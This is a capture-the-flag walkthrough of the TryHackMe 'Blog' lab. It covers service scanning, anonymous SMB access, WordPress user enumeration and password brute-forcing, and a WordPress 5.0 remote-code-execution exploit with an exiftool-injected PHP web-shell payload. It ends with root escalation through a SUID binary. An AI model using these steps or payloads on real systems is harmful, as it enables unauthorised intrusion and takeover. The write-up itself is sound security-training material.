# CTF TryHackMe - Blog

## Nmap

```bash
nmap -sC -sV -oN nmap.log blog.thm    
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-21 17:44 CET
Nmap scan report for blog.thm (10.10.100.238)
Host is up (0.074s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 57:8a:da:90:ba:ed:3a:47:0c:05:a3:f7:a8:0a:8d:78 (RSA)
|   256 c2:64:ef:ab:b1:9a:1c:87:58:7c:4b:d5:0f:20:46:26 (ECDSA)
|_  256 5a:f2:62:92:11:8e:ad:8a:9b:23:82:2d:ad:53:bc:16 (ED25519)
80/tcp  open  http        Apache httpd 2.4.29
|_http-generator: WordPress 5.0
|_http-title: Billy Joel&#039;s IT Blog &#8211; The IT blog
|_http-server-header: Apache/2.4.29 (Ubuntu)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: BLOG; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: BLOG, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time: 
|   date: 2022-03-21T16:44:57
|_  start_date: N/A
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: blog
|   NetBIOS computer name: BLOG\x00
|   Domain name: \x00
|   FQDN: blog
|_  System time: 2022-03-21T16:44:56+00:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.81 seconds
```

## Samba enumeration

Using smbclient to list shares :

```bash
smbclient --no-pass -L //blog.thm

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        BillySMB        Disk      Billy's local SMB Share
        IPC$            IPC       IPC Service (blog server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            BLOG
```

Try to connect to the *BillySMB* share as "anonymous"

```bash
smbclient -U '%' -N \\\\blog.thm\\BillySMB
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue May 26 20:17:05 2020
  ..                                  D        0  Tue May 26 19:58:23 2020
  Alice-White-Rabbit.jpg              N    33378  Tue May 26 20:17:01 2020
  tswift.mp4                          N  1236733  Tue May 26 20:13:45 2020
  check-this.png                      N     3082  Tue May 26 20:13:43 2020

                15413192 blocks of size 1024. 9790368 blocks available
smb: \>
```

Let's download all files


## Analyse samba files

Check if any files are hidden

```bash
steghide --info Alice-White-Rabbit.jpg 
"Alice-White-Rabbit.jpg":
  format: jpeg
  capacit: 1,8 KB
Essayer d'obtenir des informations  propos des donnes incorpores ? (o/n) o
Entrez la passphrase: 
  fichier  inclure "rabbit_hole.txt":
    taille: 48,0 Byte
    cryptage: rijndael-128, cbc
    compression: oui
```

Extract the rabbit_hole.txt

```
steghide extract -sf Alice-White-Rabbit.jpg

cat rabbit_hole.txt
You've found yourself in a rabbit hole, friend.
```

We can write in this share

```bash
smbclient -U '%' -N \\\\blog.thm\\BillySMB
Try "help" to get a list of possible commands.
smb: \> put test.txt
putting file test.txt as \test.txt (0,0 kb/s) (average 0,0 kb/s)
smb: \> ls 
  .                                   D        0  Mon Mar 21 18:39:34 2022
  ..                                  D        0  Tue May 26 19:58:23 2020
  Alice-White-Rabbit.jpg              N    33378  Tue May 26 20:17:01 2020
  tswift.mp4                          N  1236733  Tue May 26 20:13:45 2020
  test.txt                            A        0  Mon Mar 21 18:39:34 2022
  check-this.png                      N     3082  Tue May 26 20:13:43 2020

                15413192 blocks of size 1024. 9789108 blocks available
smb: \>
```

## Wordpress enumeration

Let's do a basic wordpress scan

```bash
wpscan --url http://blog.thm
robots.txt found: http://blog.thm/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php

Upload directory has listing enabled: http://blog.thm/wp-content/uploads/

The external WP-Cron seems to be enabled: http://blog.thm/wp-cron.php

WordPress version 5.0 identified (Insecure, released on 2018-12-06).

WordPress theme in use: twentytwenty (version 1.3)
```

Now trying to enumerate users

```bash
wpscan --url http://blog.thm --enumerate u
[..SNIP..]
[i] User(s) Identified:

[+] kwheel
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://blog.thm/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] bjoel
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://blog.thm/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] Karen Wheeler
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By: Rss Generator (Aggressive Detection)

[+] Billy Joel
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By: Rss Generator (Aggressive Detection)
```

We got 2 users, try to bruteforce password

```bash
wpscan --url http://blog.thm --passwords /usr/share/wordlists/rockyou.txt
[..SNIP..]
[SUCCESS] - kwheel / cutiepie1
```

Cool we can now login to http://blog.thm/wp-content with these creds

```
username : kwheel
password : cutiepie1
```

## Exploit Wordpress 5.0

Searched an exploit for WordPress 5.0. i found an Authenticated RCE exploit. Let's try it

https://www.exploit-db.com/exploits/49512

Before need to follow instructions :

```
# ======
# Note :
# ======
# It could be any jpg image, BUT there are some modifications first : 
# 1- image name as : "gd.jpg"
# 2- place the image in the same directory as this exploit.
# 3- inject the php payload via exiftool : exiftool gd.jpg -CopyrightNotice="<?=\`\$_GET[0]\`?>"

And change the attacker ip
```

Run the python exploit

```bash
python3 49512.py http://blog.thm/ kwheel cutiepie1 twentytwenty


__        __            _                           ____   ____ _____ 
\ \      / /__  _ __ __| |_ __  _ __ ___  ___ ___  |  _ \ / ___| ____|
 \ \ /\ / / _ \| '__/ _` | '_ \| '__/ _ \/ __/ __| | |_) | |   |  _|  
  \ V  V / (_) | | | (_| | |_) | | |  __/\__ \__ \ |  _ <| |___| |___ 
   \_/\_/ \___/|_|  \__,_| .__/|_|  \___||___/___/ |_| \_\____|_____|
                         |_|                                        
                                                5.0.0 and <= 4.9.8

usage :
=======
python3 RCE_wordpress.py http://<IP>:<PORT>/ <Username> <Password> <WordPress_theme>
[+] Login successful.

[+] Getting Wp Nonce ... 
[+] Wp Nonce retrieved successfully ! _wpnonce : 660e70faa5

[+] Uploading the image ... 
[+] Image uploaded successfully ! Image ID :37

[+] Changing the path ... 
[+] Path has been changed successfully. 

[+] Getting Ajax nonce ... 
[+] Ajax Nonce retrieved successfully ! ajax_nonce : fc3dffb784

[+] Cropping the uploaded image ... 
[+] Done . 

[+] Creating a new post to include the image... 
[+] Post created successfully . 

[+] POC is ready at : http://blog.thm/?p=39&0=id

[+] Executing payload !
```

But didn't works, in my listener i haven't any hit....

So, i searched other exploit

```bash
searchsploit wordpress 5.0

WordPress 5.0.0 - Image Remote Code Execution    
WordPress Core 5.0 - Remote Code Execution
WordPress Core 5.0.0 - Crop-image Shell Upload (Metasploit)
```

So launched metasploit, and search for Crop-image Shell Upload :

```bash
msfconsole
search Crop-image Shell Upload
```

Let's select this one, and set options needed

```bash
use 0
set PASSWORD cutiepie1
set USERNAME kwheel
set RHOST http://blog.thm
```
Run the exploit and yeah we are in !!


## PrivEsc

First, let's checker SUID

```bash
find / -user root -perm -4000 -print 2>/dev/null

[..SNIP..]
/usr/sbin/checker
```

It seem to be a "classic" SUID. Try to execute this one

```
/usr/sbin/checker
Not an Admin
```

Okay, it's a compiled program

```bash
file /usr/sbin/checker
/usr/sbin/checker: setuid, setgid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=6cdb17533a6e02b838336bfe9791b5d57e1e2eea, not stripped
```

Go to guidra to explore this

```
undefined8 main(void)

{
  char *pcVar1;
  
  pcVar1 = getenv("admin");
  if (pcVar1 == (char *)0x0) {
    puts("Not an Admin");
  }
  else {
    setuid(0);
    system("/bin/bash");
  }
  return 0;
}
```

So, we need to export admin environment variable equal to "admin" to get root

```bash
www-data@blog:/var/www/wordpress$ admin=admin
www-data@blog:/var/www/wordpress$ export $admin
www-data@blog:/var/www/wordpress$ /usr/sbin/checker
root@blog:/var/www/wordpress# id
uid=0(root) gid=33(www-data) groups=33(www-data)
```

And we are root ! :D
